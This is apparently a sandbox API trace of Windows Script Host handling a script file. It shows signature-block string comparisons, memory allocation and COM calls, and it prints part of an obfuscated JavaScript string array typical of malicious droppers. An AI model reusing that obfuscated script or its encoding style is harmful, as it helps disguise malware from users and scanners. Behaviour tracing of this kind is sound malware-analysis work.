	[0046.426] wcsncmp (_String1="g','MErCsEPDhcKacRHCmA==','wozDhs", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 90
	[0046.426] wcsncmp (_String1="','MErCsEPDhcKacRHCmA==','wozDhsK", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0046.426] wcsncmp (_String1=",'MErCsEPDhcKacRHCmA==','wozDhsKi", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 31
	[0046.426] wcsncmp (_String1="'MErCsEPDhcKacRHCmA==','wozDhsKiw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0046.426] wcsncmp (_String1="MErCsEPDhcKacRHCmA==','wozDhsKiwr", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 64
	[0046.426] wcsncmp (_String1="ErCsEPDhcKacRHCmA==','wozDhsKiwrP", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 56
	[0046.426] wcsncmp (_String1="rCsEPDhcKacRHCmA==','wozDhsKiwrPD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 101
	[0046.426] wcsncmp (_String1="CsEPDhcKacRHCmA==','wozDhsKiwrPDl", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 54
	[0046.426] wcsncmp (_String1="sEPDhcKacRHCmA==','wozDhsKiwrPDl8", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0046.426] wcsncmp (_String1="EPDhcKacRHCmA==','wozDhsKiwrPDl8K", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 56
	[0046.426] wcsncmp (_String1="PDhcKacRHCmA==','wozDhsKiwrPDl8Kx", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 67
	[0046.426] wcsncmp (_String1="DhcKacRHCmA==','wozDhsKiwrPDl8KxF", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0046.427] wcsncmp (_String1="hcKacRHCmA==','wozDhsKiwrPDl8KxFA", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 91
	[0046.427] wcsncmp (_String1="cKacRHCmA==','wozDhsKiwrPDl8KxFAY", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 86
	[0046.427] wcsncmp (_String1="KacRHCmA==','wozDhsKiwrPDl8KxFAY=", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 62
	[0046.427] wcsncmp (_String1="acRHCmA==','wozDhsKiwrPDl8KxFAY='", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 84
	[0046.427] wcsncmp (_String1="cRHCmA==','wozDhsKiwrPDl8KxFAY=',", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 86
	[0046.427] wcsncmp (_String1="RHCmA==','wozDhsKiwrPDl8KxFAY=','", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 69
	[0046.427] wcsncmp (_String1="HCmA==','wozDhsKiwrPDl8KxFAY=','w", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 59
	[0046.427] wcsncmp (_String1="CmA==','wozDhsKiwrPDl8KxFAY=','wo", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 54
	[0046.427] wcsncmp (_String1="mA==','wozDhsKiwrPDl8KxFAY=','woH", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 96
	[0046.427] wcsncmp (_String1="A==','wozDhsKiwrPDl8KxFAY=','woHD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 52
	[0046.427] wcsncmp (_String1="==','wozDhsKiwrPDl8KxFAY=','woHDt", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 48
	[0046.427] wcsncmp (_String1="=','wozDhsKiwrPDl8KxFAY=','woHDt2", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 48
	[0046.427] wcsncmp (_String1="','wozDhsKiwrPDl8KxFAY=','woHDt2Z", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0046.427] wcsncmp (_String1=",'wozDhsKiwrPDl8KxFAY=','woHDt2Zc", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 31
	[0046.427] wcsncmp (_String1="'wozDhsKiwrPDl8KxFAY=','woHDt2ZcP", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0046.427] wcsncmp (_String1="wozDhsKiwrPDl8KxFAY=','woHDt2ZcPM", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0046.427] wcsncmp (_String1="ozDhsKiwrPDl8KxFAY=','woHDt2ZcPMO", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 98
	[0046.427] wcsncmp (_String1="zDhsKiwrPDl8KxFAY=','woHDt2ZcPMOs", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 109
	[0046.427] wcsncmp (_String1="DhsKiwrPDl8KxFAY=','woHDt2ZcPMOsG", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0046.427] wcsncmp (_String1="hsKiwrPDl8KxFAY=','woHDt2ZcPMOsGX", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 91
	[0046.427] wcsncmp (_String1="sKiwrPDl8KxFAY=','woHDt2ZcPMOsGXt", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0046.427] wcsncmp (_String1="KiwrPDl8KxFAY=','woHDt2ZcPMOsGXtZ", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 62
	[0046.427] wcsncmp (_String1="iwrPDl8KxFAY=','woHDt2ZcPMOsGXtZQ", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 92
	[0046.427] wcsncmp (_String1="wrPDl8KxFAY=','woHDt2ZcPMOsGXtZQc", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0046.427] wcsncmp (_String1="rPDl8KxFAY=','woHDt2ZcPMOsGXtZQcO", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 101
	[0046.427] wcsncmp (_String1="PDl8KxFAY=','woHDt2ZcPMOsGXtZQcOI", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 67
	[0046.427] wcsncmp (_String1="Dl8KxFAY=','woHDt2ZcPMOsGXtZQcOIw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0046.427] wcsncmp (_String1="l8KxFAY=','woHDt2ZcPMOsGXtZQcOIwr", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 95
	[0046.427] wcsncmp (_String1="8KxFAY=','woHDt2ZcPMOsGXtZQcOIwrn", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 43
	[0046.427] wcsncmp (_String1="KxFAY=','woHDt2ZcPMOsGXtZQcOIwrnD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 62
	[0046.427] wcsncmp (_String1="xFAY=','woHDt2ZcPMOsGXtZQcOIwrnDj", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 107
	[0046.427] wcsncmp (_String1="FAY=','woHDt2ZcPMOsGXtZQcOIwrnDj1", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 57
	[0046.427] wcsncmp (_String1="AY=','woHDt2ZcPMOsGXtZQcOIwrnDj1l", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 52
	[0046.427] wcsncmp (_String1="Y=','woHDt2ZcPMOsGXtZQcOIwrnDj1lV", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 76
	[0046.427] wcsncmp (_String1="=','woHDt2ZcPMOsGXtZQcOIwrnDj1lVN", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 48
	[0046.428] wcsncmp (_String1="','woHDt2ZcPMOsGXtZQcOIwrnDj1lVNs", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0046.428] wcsncmp (_String1=",'woHDt2ZcPMOsGXtZQcOIwrnDj1lVNsO", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 31
	[0046.428] wcsncmp (_String1="'woHDt2ZcPMOsGXtZQcOIwrnDj1lVNsOU", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0046.428] wcsncmp (_String1="woHDt2ZcPMOsGXtZQcOIwrnDj1lVNsOUR", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0046.428] wcsncmp (_String1="oHDt2ZcPMOsGXtZQcOIwrnDj1lVNsOURH", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 98
	[0046.428] wcsncmp (_String1="HDt2ZcPMOsGXtZQcOIwrnDj1lVNsOURHf", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 59
	[0046.428] wcsncmp (_String1="Dt2ZcPMOsGXtZQcOIwrnDj1lVNsOURHfD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0046.428] wcsncmp (_String1="t2ZcPMOsGXtZQcOIwrnDj1lVNsOURHfDg", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 103
	[0046.428] wcsncmp (_String1="2ZcPMOsGXtZQcOIwrnDj1lVNsOURHfDgl", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 37
	[0046.428] wcsncmp (_String1="ZcPMOsGXtZQcOIwrnDj1lVNsOURHfDgl0", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 77
	[0046.428] wcsncmp (_String1="cPMOsGXtZQcOIwrnDj1lVNsOURHfDgl0k", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 86
	[0046.428] wcsncmp (_String1="PMOsGXtZQcOIwrnDj1lVNsOURHfDgl0kw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 67
	[0046.428] wcsncmp (_String1="MOsGXtZQcOIwrnDj1lVNsOURHfDgl0kw4", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 64
	[0046.428] wcsncmp (_String1="OsGXtZQcOIwrnDj1lVNsOURHfDgl0kw4t", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0046.428] wcsncmp (_String1="sGXtZQcOIwrnDj1lVNsOURHfDgl0kw4tD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0046.428] wcsncmp (_String1="GXtZQcOIwrnDj1lVNsOURHfDgl0kw4tDw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 58
	[0046.428] wcsncmp (_String1="XtZQcOIwrnDj1lVNsOURHfDgl0kw4tDw4", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 75
	[0046.428] wcsncmp (_String1="tZQcOIwrnDj1lVNsOURHfDgl0kw4tDw4R", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 103
	[0046.428] wcsncmp (_String1="ZQcOIwrnDj1lVNsOURHfDgl0kw4tDw4RS", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 77
	[0046.428] wcsncmp (_String1="QcOIwrnDj1lVNsOURHfDgl0kw4tDw4RSw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 68
	[0046.428] wcsncmp (_String1="cOIwrnDj1lVNsOURHfDgl0kw4tDw4RSw7", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 86
	[0046.428] wcsncmp (_String1="OIwrnDj1lVNsOURHfDgl0kw4tDw4RSw7H", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0046.428] wcsncmp (_String1="IwrnDj1lVNsOURHfDgl0kw4tDw4RSw7HC", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 60
	[0046.428] wcsncmp (_String1="wrnDj1lVNsOURHfDgl0kw4tDw4RSw7HCn", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0046.428] wcsncmp (_String1="rnDj1lVNsOURHfDgl0kw4tDw4RSw7HCn8", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 101
	[0046.428] wcsncmp (_String1="nDj1lVNsOURHfDgl0kw4tDw4RSw7HCn8O", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 97
	[0046.428] wcsncmp (_String1="Dj1lVNsOURHfDgl0kw4tDw4RSw7HCn8Om", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0046.428] wcsncmp (_String1="j1lVNsOURHfDgl0kw4tDw4RSw7HCn8Omw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 93
	[0046.428] wcsncmp (_String1="1lVNsOURHfDgl0kw4tDw4RSw7HCn8Omw5", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 36
	[0046.428] wcsncmp (_String1="lVNsOURHfDgl0kw4tDw4RSw7HCn8Omw5J", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 95
	[0046.428] wcsncmp (_String1="VNsOURHfDgl0kw4tDw4RSw7HCn8Omw5Jp", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 73
	[0046.428] wcsncmp (_String1="NsOURHfDgl0kw4tDw4RSw7HCn8Omw5JpX", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 65
	[0046.428] wcsncmp (_String1="sOURHfDgl0kw4tDw4RSw7HCn8Omw5JpXD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0046.428] wcsncmp (_String1="OURHfDgl0kw4tDw4RSw7HCn8Omw5JpXDo", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0046.428] wcsncmp (_String1="URHfDgl0kw4tDw4RSw7HCn8Omw5JpXDot", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 72
	[0046.428] wcsncmp (_String1="RHfDgl0kw4tDw4RSw7HCn8Omw5JpXDotC", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 69
	[0046.429] wcsncmp (_String1="HfDgl0kw4tDw4RSw7HCn8Omw5JpXDotC8", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 59
	[0046.429] wcsncmp (_String1="fDgl0kw4tDw4RSw7HCn8Omw5JpXDotC8O", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 89
	[0046.429] wcsncmp (_String1="Dgl0kw4tDw4RSw7HCn8Omw5JpXDotC8O7", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0046.429] SetLastError (dwErrCode=0xb) 
	[0046.430] ComputeAccessTokenFromCodeAuthzLevel () returned 0x1
	[0046.430] CloseCodeAuthzLevel () returned 0x1
	[0046.430] FreeLibrary (hLibModule=0x7fefd710000) returned 1
	[0046.430] ??2@YAPEAX_K@Z () returned 0xdf3f0
	[0046.430] SysStringLen (param_1="var dogoswoisosfhsdiefgssqda=['wqtowqjClg==','w5Mcwr/DvcOsK2cuBQ==','wrvDpsOqD8KNwpbCjh8pasKgV8Ozb1xZw7jDu8OwwrtSXDnDgMOwa0XCr8OAw69Dw79yA8OW','w5/Cn8KKbMK5HsOefsOg','MErCsEPDhcKacRHCmA==','wozDhsKiwrPDl8KxFAY=','woHDt2ZcPMOsGXtZQcOIwrnDj1lVNsOURHfDgl0kw4tDw4RSw7HCn8Omw5JpXDotC8O7eMKVwpxeYw==','wrDCpsOTwqBiwqfDjELCj27CoETDmHnDnxhqw5fClMKJGsOzwoPCqcOYQm1XW3sBCsOEPcKfZiU7EzrDuMODwp7Cp8OaKMOHw4wDVD5ZfMONfsO/w5c/wq5Ww7jChcOTwrNeIGbDs8KrPVvDqyEjOsKmKDxiwp5aw7jCtgTDuxxXacO3OHJsVk5XwozDvzrCpg==','wqprwqgaw4jCih0=','wofDo8KZwpvDq8KMYn/ConzDt8Kyw6xiQsOIE8OWwrFHPsO3w4PCiEHCk8K3wq7Cn1g=','wozDkcKcwozCmMO4Ew3CojHCnQ==','w7JGw6XCpS4=','w49sw43DuMKR','wrVrwr05w4o=','w4QQwpzCqMK9','wqrDu8OaCsOw','AHliEUE=','UxoSMTA=','UhQDDwg=','cwtkccKr','w79Mw6/DjsKfwqnCi8OTw5FhG8OgFnpkJA==','wowhFljClA==','csO8AMOuZA==','bhADAg==','woTCr8Owwr1N','TErDmMK6wos=','NAbDsMOpNw==','wq7DmsKJw4Z5','wqvCvEbCoks=','w5DDszthPQ==','wrDDgcKlZsKz','wqnDjsKVXcK9','wrrCs8KEDcOY','WcKzfsKnfA==','QTp1VsKB','wqrDicOVbsKL','enXCv8K7','w64uwqc2w4Y=','HnBCBg==','wqYCYQYf','XFbDmMKnwoDCi8Kew6/DpmjCrg==','wo1iUsO9Pw==','w7zDgcOjP8Kt','Rg11bsKR','w5pBwqUBwo8=','O2XCk8O/w6A=','woXCk8OZwrZq','wrvCu8Owwot+','wq5owo0pw64=','ZsOmG8OlTw==','e8OPwq4qMQ==','YhZ3d8Ki','w4BbwpvCt8OY','w7o+woQsw4s=','wojDosO+LcOW','ZH7DvC/DlQ==','c3dOwozChQ==','woVCZsOBPw==','TQxZW8Kn','PRTDssOyFw==','wpcDwpvDmsOo','RlTDuMKywqA=','NsKlecK7w7Q=','YMO/EsOldg==','w55Qw7nDosKj','w5DDmcOseDvDjsKhw4jChX0cVA3DkW/CqMKTw5QLXMOHcMKowrrCux1bwqoBRsKPw79aAGMbw6B4ZTLCrMKKBsKVwq7DglMRK8KRHjTCuMK8w514JxRiwr3DgcKX','wrXClsKBHMOa','wofDu8OVNsOZ','wqXCksOSwoU=','w61Jw6zCsCs=','XMOwOcOz','w6fCq8OoGWE=','LFYlKX0=','wobCgcKOw6ck','w7NpwpfCksOK','GUTCrcOhw7k=','HMOuwqLCn18=','w51Lw7zCoyo=','woZ5TMO8HA==','wqIMDH3Cr8KFQyNUwq8w','w5zDt2Mxwqc=','CMKwDcOTw4w=','I1NBHlA=','w4ljw6XCpzE=','wp8zwqLDkMOy','wqLCh8ONwph/','w7/DmMOLMA==','wqDDnMO6ZcKf','w4V4wp4RwoweF8OtH110dE4=','wp7DoMO6PsOVw5ZJFsOQbMKJCELCow==','DEvCrcOWw6hQwq4jKMOWHwrCqMK+w7J1wqPDhyk=','wpAMI0DCkw==','w7DDuH0rwr8=','OSrDhsOAOcKVQsKIXFXDpsOIwrYRwo0y','wpfCvMOQwotA','wqXCi1rCgm0=','d37CtMK6','F3JpGko=','wpfCnsKzOsO2','Gn9GHWs=','WlXDnsKKwok=','P8OnwrPDp8K6','XQxsS8KX','w4BBw5LDmsKj','LMOVwqvClsOq','wqHChUHCrmc=','dnfCl8KKw4s=','wrzDi8KEw75j','w5ELwpUqw5E=','HGLCv8O5w4M=','O8OCwpfCs0s=','w59uw6rDmMK/','NsOTwonCnms=','OcOrwqvCvV4=','VUHDj8KFwrE=','w6PDssO3KsKg','VcKqXMKseA==','KcOWwpHDq8KJ','wonDtcKkwqlF','wrjCt8KIw5gFIQ==','G8Orwr/DsAE=','w51iwpwgwpw=','wrrDi8KQw75X','U2hiwoPClA==','wovDjsKpwohCQw4=','PVV+A0E=','w75OwpMEwpEG','RQYPLiM=','TUPDoSjDng==','w6nDigxBCw==','wrTCnsK5LMOh','esKJZMKIfA==','wqgkNXTCng==','JMOKw7zCvw==','wrENRAc5','O8OUwpHDpsKa','eXfCuMK8','BznDhcORJw==','QmRawpbCosOIe8KsEXTCow==','UEdxwqTCpQ==','w4xdw4/CpSY=','H8OFwrTDisKc','SMOdwo8SPA==','d8KmRcKYew==','w7ELwoLCj8KIw4F4','G8OZwoTDiTw=','wq7DhcKYwrdc','wpvCgMK2M8OR','wpHDr8Krw5Fh','wqfDl8K7wrTDrg==','YcOhanFu','IcO7w6bChSI=','wqfDoMK0bMKm','wqrChcKCH8O0','w5Zww6DDrsKS','w4TDmMOjEMKg','PDDDhsOQOcKOWMKFCBDDiA==','wqrDnMKkwo7Dn8O0G0nCgW3Dg8ORwq9ISg==','w7TDh8OSMsKR','PSfDscOCHg==','wqXCsE7CsnM=','w5TDkSVzAQ==','PsONwrHDlCg=','MsOKwpzDlMKK','RWYWwpnDvg==','woMbB1bCqQ==','wqbCmsKQw6Ia','wo7DqMKtVMKt','czRabsKB','ADDCiTnDhcOhGn/Diix+woFBwptnaMKKTcOlwo3DgMOEwq1GwobDjMKxw5PDtcOtwoLDlsOgw57DuFUgwrVcwqcJMR7CnmbCnQbDnAhKw7QHwrhuM8Odw68AFcKbOsOB','w5DDt1cuwo8=','W0fDisKn','wobDhMKSwoh5','cVrCm8K+w6A=','w6HDksORKg==','wrfCpVHCjlM=','w7dEw7fCly8=','w6fDrTNQJg==','w6wne8Oiw50=','woJqwokjw50=','wqjClMKNw4gz','Fl3CgljCqw==','woddeMOeMsKJwoHCj8OaNno=','wo0rFljCjQ==','w5FWw6rChig=','wpHDqsK2w4Y=','wqHCs1rCuw==','w6NfwprCsMO1FA==','BsKiMcORw5M=','w4tHw5bCsgw=','w5YwRsOmw6HDicKQw7ZEXcOB','w6UMwp7CjcKZwoQiwo5zdHrDj8KBRsOf','wqEmXCgH','S8O6JMO0aMKow7A1bQLCrg==','w6QTZcO8w7o=','fcKneMK0SA==','woPDj8OdUcKH','w4Ffw6zDn8KB','f0fCl8KIw6E=','w6jCvMOqPXU=','wp3CjMKCw4cN','wrYOcRgw','wpx6wpQ+w5U=','w6nClMO6Ilc=','w7rDgMOvGMKM','wqfDtMKTU8Ky','wrjCkFXCgGfDpMODwprDh8OMwrnDs8KiSgsWwplte8K1woILw4rCs8KbRQ0CwqpeGR1qwrvDv2zCmQnDozBPOcKlU8KDdwZ5V8KzbsKhwrrDtMOQwrlGFsKmw7JSNmF5BsOTLsKMHF9kwoHCmsOzLx3Dg8KsbcKkFcKuNnvCjA==','w43DlsKCHMKLwqDChxo5TcKScsO6fWQ8w47DvcObwr9UT3fDhsOpW0vCvMOLw4Mrw6BAdMOfw4XCiULCsXXDlcOlRsKXLRA2woLDoMOvw47DkMO2w6YIw6DDqsO1w7/DmsKndWATwoU3w4ozwqdLYsOsJ0XCrw==','w51Tw57CqzXDuQ==','WsKDc8KJ','Bz7DhMKND8KfesK+HR7DuMKDw4Fj','w5lhw43Cvg7Dj8OMwoDDjmE7exhkLcKCGcOiwoYwdsKlwonDu8OAwqlWfyXDiWNDeBHDlX4YbMKuFHjCpsKTFMOTwqdCwqJQwpDDpyVmFMKyO8O0w5MQw5oxwqvDj1XDpG/DrcKtw6A5wqvCkUA=','C0PCtErCp8KoZRjCkRAMwpo+w7w8d8KpA8OUw6XCjMKxwrIMwqrCoA==','w7Nowr8AwrI2AsK1FndyT3rDgMOWw68CLcKLF2QawpVtdMOHKFdFCXgLw4fCosO7D3gncsK/ScOow74dw6jCp8KZTcKHw4PCrcKbwqbCp8Oew5M7wrDDhsOaDcO9','OcOlwq3CucO2w5hLw4N0CcO1w4A=','Vn7DjiDDu8Kjw4I9wrRPwr3CrAzCh0I=','w7XDjWwjwrzCoANpAMOlSCgQB8OPBA==','T0gswqrDrcObbRBLLsONwpHCrMOzw41vw6LDnR3CgEJxw4/DgMKbTcOOTMOVw4BEw5TDtcOPSw==','w4BfwrnCgcO7ImweNx7CiMObw6EdeCXDigHCnzU=','wp/Dl8KawrrDm8KzcQ==','bnwjwpPDm8KqD1F+','B8KyGsOh','K8O1wqnDsiTCnMKtwrYTfQ/CpcK8EUbCuBUuw5nCncOlw4PCsmEpwr7CgcKtEQ==','wq7CksKWw50u','wrPDh8O8WMKvEsOESMOFQMKgXXPDqsKEX8KlIsO2NELDu8KvA8Olw6cOL8K6wqDCukkVS8Oswr06Di/CocOmRsO6wptnwoNtAMKzw6lRw5ofPMOHNhJb") returned 0x4b68
	[0046.430] GetProcessHeap () returned 0x3f0000
	[0046.430] RtlReAllocateHeap (Heap=0x3f0000, Flags=0x0, Ptr=0x428430, Size=0x11238) returned 0x45ae20
	[0046.431] ??2@YAPEAX_K@Z () returned 0xdf480
	[0046.431] GetCurrentThreadId () returned 0xb5c
	[0046.431] realloc (_Block=0x0, _Size=0xc8) returned 0xdf4e0
	[0046.432] ??2@YAPEAX_K@Z () returned 0xdf5b0
	[0046.432] malloc (_Size=0x1008) returned 0xda4f0
	[0046.432] ??2@YAPEAX_K@Z () returned 0xdf5f0
	[0046.432] malloc (_Size=0x108) returned 0xd8060
	[0046.436] malloc (_Size=0x208) returned 0xdf7a0
	[0046.436] malloc (_Size=0x200) returned 0xdf9b0
	[0046.436] malloc (_Size=0x408) returned 0xdfbc0
	[0046.436] malloc (_Size=0x2008) returned 0xdb500
	[0046.437] malloc (_Size=0x808) returned 0xdd510
	[0046.437] malloc (_Size=0x1008) returned 0xddd20
	[0046.438] malloc (_Size=0x4008) returned 0x26dfd0
	[0046.438] malloc (_Size=0x2008) returned 0x271fe0
	[0046.447] malloc (_Size=0x4008) returned 0x273ff0
	[0046.448] malloc (_Size=0x108) returned 0xd8170
	[0046.448] realloc (_Block=0x0, _Size=0x64) returned 0xded30
	[0046.448] realloc (_Block=0x0, _Size=0x64) returned 0xdeda0
	[0046.448] realloc (_Block=0xdeda0, _Size=0x38) returned 0xdeda0
	[0046.465] realloc (_Block=0xdf5f0, _Size=0x60) returned 0xdf5f0
	[0046.465] realloc (_Block=0xdf5f0, _Size=0x90) returned 0xdf5f0
	[0046.465] realloc (_Block=0xdf5f0, _Size=0xd8) returned 0xdf5f0
	[0046.465] realloc (_Block=0xdf5f0, _Size=0x140) returned 0xdf5f0
	[0046.465] realloc (_Block=0xdf5f0, _Size=0x1e0) returned 0xdf9b0
	[0046.465] realloc (_Block=0xdf9b0, _Size=0x2d0) returned 0xded30
	[0046.465] realloc (_Block=0xded30, _Size=0x438) returned 0x298080
	[0046.465] realloc (_Block=0x298080, _Size=0x650) returned 0x298080
	[0046.468] realloc (_Block=0x298080, _Size=0x978) returned 0x298080
	[0046.468] malloc (_Size=0x4008) returned 0x298a10
	[0046.468] realloc (_Block=0x298080, _Size=0xe30) returned 0x29ca20
	[0046.468] malloc (_Size=0x12620) returned 0x29d860
	[0046.471] ??2@YAPEAX_K@Z () returned 0xdf0b0
	[0046.471] free (_Block=0x28c050) 
	[0046.471] free (_Block=0x278000) 
	[0046.471] free (_Block=0x26dfd0) 
	[0046.471] free (_Block=0xdb500) 
	[0046.471] free (_Block=0xda4f0) 
	[0046.471] ??3@YAXPEAX@Z () returned 0x1dd30701
	[0046.471] free (_Block=0x29ca20) 
	[0046.471] free (_Block=0x298a10) 
	[0046.471] free (_Block=0x294070) 
	[0046.472] free (_Block=0x290060) 
	[0046.472] free (_Block=0x288040) 
	[0046.472] free (_Block=0x284030) 
	[0046.472] free (_Block=0x280020) 
	[0046.472] free (_Block=0x27c010) 
	[0046.472] free (_Block=0x273ff0) 
	[0046.472] free (_Block=0x271fe0) 
	[0046.473] free (_Block=0xddd20) 
	[0046.473] free (_Block=0xdd510) 
	[0046.474] free (_Block=0xdfbc0) 
	[0046.474] free (_Block=0xdf7a0) 
	[0046.474] free (_Block=0xd8060) 
	[0046.474] ??2@YAPEAX_K@Z () returned 0xdf5b0
	[0046.474] ??2@YAPEAX_K@Z () returned 0xdf610
	[0046.474] malloc (_Size=0x10) returned 0xdf640
	[0046.474] free (_Block=0xdf4e0) 
	[0046.474] ??2@YAPEAX_K@Z () returned 0xdf4e0
	[0046.474] CoGetObjectContext (in: riid=0x7fee3376350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x25ef88 | out: ppv=0x25ef88*=0x40f420) returned 0x0
	[0046.491] ??2@YAPEAX_K@Z () returned 0xdf560
	[0046.492] StdGlobalInterfaceTable:IGlobalInterfaceTable:RegisterInterfaceInGlobal (in: This=0x7fefec0a1b0, pUnk=0xdf560, riid=0x7fee3376340*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pdwCookie=0xdf598 | out: pdwCookie=0xdf598*=0x100) returned 0x0
	[0046.493] IUnknown:AddRef (This=0x40f420) returned 0x2
	[0046.493] IUnknown:Release (This=0x40f420) returned 0x1
	[0046.493] ??2@YAPEAX_K@Z () returned 0x2afe90
	[0046.493] ??2@YAPEAX_K@Z () returned 0xdf940
	[0046.494] CoGetObjectContext (in: riid=0x7fee3376350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x25efd8 | out: ppv=0x25efd8*=0x40f420) returned 0x0
	[0046.494] IUnknown:Release (This=0x40f420) returned 0x1
	[0046.494] ??2@YAPEAX_K@Z () returned 0xdfa00
	[0046.494] ISystemDebugEventFire:IsActive (This=0x4275b0) returned 0x1
	[0046.494] CoGetObjectContext (in: riid=0x7fee3376350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x25ef78 | out: ppv=0x25ef78*=0x40f420) returned 0x0
	[0046.494] IUnknown:Release (This=0x40f420) returned 0x1
	[0046.495] malloc (_Size=0x2e48) returned 0xda4f0
	[0046.495] GetCurrentThreadId () returned 0xb5c
	[0046.495] ??2@YAPEAX_K@Z () returned 0xdfae0
	[0046.496] ??2@YAPEAX_K@Z () returned 0xdfbc0
